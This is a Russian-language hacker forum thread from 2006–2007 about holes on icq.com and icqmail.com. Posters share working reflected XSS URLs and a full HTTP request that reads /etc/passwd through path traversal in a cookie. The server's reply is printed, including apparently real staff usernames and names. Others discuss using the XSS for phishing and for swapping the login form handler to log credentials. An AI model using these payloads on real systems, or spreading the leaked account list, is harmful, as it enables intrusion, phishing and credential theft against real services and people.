XSS ICQ.COM

n0Ldar Guest	#1 Это нравится:0 Да/0 Нет 11.05.2006 20:43:40 XSS ICQ.COM http://www.icq.com/boards/search_results.php?uSearchString=%3Cscript%3Ealert%28%22has_found_by_n0Ldar%22%29%3B%3C%2Fscript%3E

not null Guest	#2 Это нравится:0 Да/0 Нет 11.05.2006 22:13:22 дето я это уже видел...афтору пришлось несладко

Shanker мастер Сообщений: 1446 Баллов: 1464 Регистрация: 28.09.2003 всего лишь человек...	#3 Это нравится:0 Да/0 Нет 12.05.2006 01:43:29 Кажись пару месяцев назад в Хакере писали "Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."

UnWin inc. Guest	#4 Это нравится:0 Да/0 Нет 12.05.2006 08:33:18 Емое дык сеня 12 Мая а дырка есть.. Чем они там занимаюца

Алексей Харченко

Guest

Это нравится:0 Да/0 Нет

13.05.2006 09:36:18

кроме того, можно и так:
http://www.icq.com/boards/search_results.php?uSearchString=%3Cscript%3Ealert%28%22has_found_by_n0Ldar%22%29%3B%3C%2Fscript%3E%3Cscript%3Ealert%28%22has_found_by_n0Ldar%22%29%3B%3C%2Fscript%3E%3Cscript%3Ealert%28%22has_found_by_n0Ldar%22%29%3B%3C%2Fscript%3E%3Cscript%3Ealert%28%22has_found_by_n0Ldar%22%29%3B%3C%2Fscript%3E%3Cscript%3Ealert%28%22has_found_by_n0Ldar%22%29%3B%3C%2Fscript%3E%3Cscript%3Ealert%28%22has_found_by_n0Ldar%22%29%3B%3C%2Fscript%3E%3Cscript%3Ealert%28%22has_found_by_n0Ldar%22%29%3B%3C%2Fscript%3E
....и так далее..
Интересно, а предел есть?

Phoenix Guest	#6 Это нравится:0 Да/0 Нет 13.05.2006 15:56:01 по почему предел должен быть!!? http://www.icq.com/boards/search_resu...

Андрей К. aka Skvoznoy

эксперт

Сообщений: 895 Баллов: 909 Регистрация: 25.08.2006

Это нравится:0 Да/0 Нет

03.01.2007 01:42:25

Хех, да что там XSS, раскрытие passwd на лицо через cookie параметр

Цитата

GET http://icq.com:80/people/ HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: icq.com
Cookie: geo=7;icq_lang=../../../../../../../../etc/passwd%00.html;ps_gender=deleted;ps_age_grp=0;ps_cc=7;ps_dating_mode=0;recent_keywords_icq=%253CSearch%253E;recent_icqSearch=Search%253Eicq%253E%253Eweb%253E%253E0%253E1166099692%253E;recent_keywords_web=%253CSearch%253E;recent_webSearch=Search%253Eweb%253E%253Eweb%253E%253E0%253E1166099701%253E;%20expires=Fri%2C%2015%20Dec%202006%2000%3A35%3A17%20UTC;%20path=%2F;%20domain=%2Eicq%2Ecom;s_cc=true;=111-222-1933email@address.com;moreProd=AllProduct;poll_view=1;recent_searches_on=no;thumb_srch=hide
Connection: Close
Pragma: no-cache

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/bash
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/bin/false
news:x:9:13:news:/var/spool/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucp:/bin/false
operator:x:11:0:operator:/root:/bin/false
games:x:12:20:games:/usr/games:/bin/false
gopher:x:13:30:gopher:/usr/lib/gopher-data:/bin/false
ftp:x:14:50:FTP User:/var/ftp:/bin/false
squid:x:23:23:Squid Cache User:/var/spool/squid:/dev/null
pvm:x:24:24::/usr/share/pvm3:/bin/bash
named:x:25:25:Bind Daemon:/var/named:/bin/false
postgres:x:26:26:PostgreSQL Server User:/var/lib/pgsql:/bin/bash
mysql:x:27:27:Mysql User:/var/lib/mysql:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/bin/false
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/false
netdump:x:34:34:Network Crash Dump User:/var/crash:/bin/bash
rpm:x:37:37:Red Hat Package Manager User:/var/lib/rpm:/bin/bash
ntp:x:38:38:Network Time Protocol User:/etc/ntp:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/var/mailman:/bin/false
gdm:x:42:42:Gnome Display Manager User:/var/gdm:/bin/bash
xfs:x:43:43:X Font Server User:/etc/X11/fs:/bin/false
mailnull:x:47:47:Mail Queue User:/var/spool/mqueue:/dev/null
apache:x:48:48:Apache User:/var/www:/bin/false
wnn:x:49:49:wnn:/home/wnn:/bin/bash
smmsp:x:51:51:smmsp mail user:/var/spool/mqueue:/dev/null
tomcat:x:53:53:Tomcat User:/var/lib/tomcat:/sbin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
frontpage:x:56:56:Frontpage User:/var/www:/bin/false
piranha:x:60:60::/etc/sysconfig/ha:/dev/null
webalizer:x:67:67:Webalizer User:/var/www/html/usage:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
privoxy:x:73:73::/etc/privoxy:/bin/bash
sshd:x:74:74::/var/empty/sshd:/sbin/nologin
radvd:x:75:75:radvd user:/:/bin/false
cyrus:x:76:70:cyrus imap user:/var/imap:/bin/bash
pcap:x:77:77:TCPdump User:/var/arpwatch:/sbin/nologin
fax:x:78:78:mgetty fax spool user:/var/spool/fax:/sbin/nologin
nocpulse:x:79:79:nocpulse user:/etc/sysconfig/nocpulse:/bin/bash
desktop:x:80:80:desktop:/:/sbin/nologin
messagebus:x:81:81:messagebus:/:/sbin/nologin
postfix:x:82:82:postfix:/var/spool/postfix:/bin/true
majordomo:x:91:91:majordomo mailing list:/usr/lib/majordomo:/bin/bash
quagga:x:92:92:quagga:/:/sbin/nologin
dovecot:x:97:97:quagga:/usr/libexec/dovecot:/sbin/nologin
ident:x:98:98:pident user:/:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
nobody:x:99:99:Nobody:/:/bin/false
aviz:Kerberos:5020:1026:Avi Zarchia:/home/shared:/bin/ksh
dixonjm:Kerberos:16464:1026:Jeannette M Dixon:/home/shared:/bin/ksh
garfield:Kerberos:1346:1026:Garfield Burke:/home/shared:/bin/ksh
gmoore:Kerberos:1512:1026:Gene Moore:/home/shared:/bin/ksh
icqadm:Kerberos:8186:1026:icqadm:/home/icqadm:/bin/ksh
icqlog:Kerberos:7664:20:icq log-pull:/home/shared:/bin/ksh
ircacct:Kerberos:15013:1693:ICQ IRC:/home/shared:/bin/ksh
jingwu:Kerberos:3017:1026:Jing Wu:/home/shared:/bin/ksh
jobi:Kerberos:13695:1026:JOBI:/home/shared:/bin/ksh
jrogers:Kerberos:4090:1026:James Rogers:/home/shared:/bin/ksh
jthomp:Kerberos:7369:1026:James Thompson:/home/shared:/bin/ksh
kate:Kerberos:679:20:Kate Stuhrke:/home/shared:/bin/ksh
lpeters:Kerberos:379:20:Les Peters:/home/shared:/bin/csh
mcope:Kerberos:5394:1026:Michael Cope:/home/shared:/bin/ksh
mdavis:Kerberos:8141:1026:Matt Davis:/home/shared:/bin/ksh
mirab:Kerberos:12787:1013:Mirab:/home/shared:/bin/false
oallen:Kerberos:1818:1026:Orlando Allen:/home/shared:/bin/csh
oliver:Kerberos:2842:1026:Oliver Morales:/home/shared:/bin/ksh
pmorgan:Kerberos:5490:1026:Paul Morgan:/home/shared:/bin/ksh
pross:Kerberos:1425:1026:Phillip Ross:/home/shared:/bin/ksh
quantum:Kerberos:229:30:Quantum:/home/quantum:/bin/ksh
regman64:Kerberos:2962:1026:Reginald Samuel:/home/shared:/bin/ksh
risrael:Kerberos:1691:1026:Robert Israel:/home/shared:/bin/ksh
sda:Kerberos:13947:1026:Scott Anderson:/home/shared:/bin/ksh
ssahai:Kerberos:9730:1026:Scot Sahai:/home/shared:/bin/ksh
taraschk:Kerberos:17630:1026:Matthew Taraschke:/home/shared:/bin/ksh
wcooper:Kerberos:2566:1026:William Cooper:/home/shared:/bin/ksh
wuts_adm:Kerberos:1160:20:WUTS Admin:/home/wuts_adm:/bin/ksh
yonit:Kerberos:12865:1026:Yonit Gruber:/home/shared:/bin/ksh

fowl Guest	#8 Это нравится:0 Да/0 Нет 03.01.2007 15:09:01 охренеть! Ну ты просто дыроискатель! Тут уже взломом icq.com попахивает..

kirill Guest	#9 Это нравится:0 Да/0 Нет 19.01.2007 14:26:56 у миня аську хакнулли,сменили пароль!!может подскажешь как её восстановить?? очень нужно

[53x]Shadow Guest	#10 Это нравится:0 Да/0 Нет 19.01.2007 14:39:21 хакнуть обратно А если серьезно, мона попробывать скрипт "забыл пароль", если примари майл не сменили исчо!

kirill Guest	#11 Это нравится:0 Да/0 Нет 19.01.2007 14:47:05 а па другому никак??майл уже сменили!!!!!!

Андрей К. aka Skvoznoy

эксперт

Сообщений: 895 Баллов: 909 Регистрация: 25.08.2006

#12

Это нравится:0 Да/0 Нет

19.01.2007 21:35:35

пива выпить и начать домогаться флудом.
следи за собственной безопасностью в будущем - устанавливай сложные пароли, установи антивирус и файервол, настрой безопасность ОС, и спи спокойно.

s1b

Guest

#13

Это нравится:0 Да/0 Нет

20.01.2007 14:05:35

Цитата
Андрей К. aka Skvoznoy пишет: Хех, да что там XSS, раскрытие passwd на лицо через cookie параметр

если ты нашёл - респект... в очередной раз убеждаюсь, что и в крупных проектах есть не менее крупные дырки

Андрей К. aka Skvoznoy

эксперт

Сообщений: 895 Баллов: 909 Регистрация: 25.08.2006

#14

Это нравится:0 Да/0 Нет

20.01.2007 15:33:42

Код
http://icqmail.com/resellercenter/login.asp?Err=3&Usr=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert('skvoz')%3B%3C/ScRiPt%3E

XSS на стороннем ресурсе.

Сказать прямо воспользовавшись подобными XSS для фишинга, можно добиться неплохих результатов, к примеру:

[53x]Shadow Guest	#15 Это нравится:0 Да/0 Нет 21.01.2007 23:35:57 А дальше подменяем в форме скрипт обработки пароля/логина на свой и все логируем

ZEROska Guest	#16 Это нравится:0 Да/0 Нет 31.01.2007 21:49:26 прикольно

[53x]Shadow Guest	#17 Это нравится:0 Да/0 Нет 01.02.2007 15:21:10 Честно говоря мало прикольного в пассивной хсс

Андрей К. aka Skvoznoy эксперт Сообщений: 895 Баллов: 909 Регистрация: 25.08.2006	#18 Это нравится:0 Да/0 Нет 01.02.2007 20:54:51 если вы думаете, что единственным вектором нападения является кража куки - вы глубоко заблуждаетесь.

[53x]Shadow

Guest

#19

Это нравится:0 Да/0 Нет

01.02.2007 23:30:19

Векторов нападения достаточно много, о чем свидетельствует мое предыдущее сообщение в этой теме про icqmail, имхо активная - эффективнее, в пассивке же все в конечном итоге упирается в СИ(подсовывание ссылки, перенаправление на спец. страницу и тд).

Андрей К. aka Skvoznoy

эксперт

Сообщений: 895 Баллов: 909 Регистрация: 25.08.2006

#20

Это нравится:0 Да/0 Нет

02.02.2007 18:46:48

Цитата
А дальше подменяем в форме скрипт обработки пароля/логина на свой и все логируем

Увы, с перезаписью файлов рекомендуется руководствоваться CSRF/XSRF методами с уже имеющимся на сервере интерпретатором

Логин:
Пароль:
	Запомнить меня на этом компьютере

Забыли свой пароль?